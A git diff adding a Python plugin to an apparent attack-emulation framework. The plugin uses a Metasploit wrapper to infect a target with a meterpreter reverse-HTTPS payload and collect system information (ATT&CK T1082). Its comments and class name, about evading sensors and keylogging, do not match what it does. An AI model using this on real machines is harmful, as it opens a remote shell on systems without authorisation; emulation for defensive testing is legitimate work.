diff --git a/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py b/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py new file mode 100644 index 0000000..3e1d1aa --- /dev/null +++ b/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py @@ -0,0 +1,44 @@ +#!/usr/bin/env python3 + +# A plugin to nmap targets slow motion, to evade sensors + +from plugins.base.attack import AttackPlugin +from app.metasploit import MetasploitInstant + + +class MetasploitKeyloggingPlugin(AttackPlugin): + + # Boilerplate + name = "metasploit_sysinfo" + description = "Sysinfo" + ttp = "T1082" + references = ["https://attack.mitre.org/techniques/T1082/"] + + required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + + def __init__(self): + super().__init__() + self.plugin_path = __file__ + + def run(self, targets): + """ Run the command + + @param targets: A list of targets, ip addresses will do + """ + + res = "" + payload_type = "windows/meterpreter_reverse_https" + payload_name = "babymetal.exe" + target = self.targets[0] + + metasploit = MetasploitInstant(self.metasploit_password, + attack_logger=self.attack_logger, + attacker=self.attacker_machine_plugin, + username=self.metasploit_user) + + metasploit.smart_infect(target, payload_type, payload_name, ) + + si = metasploit.sysinfo(target) + print(f"Sysinfo: {si}") + + return res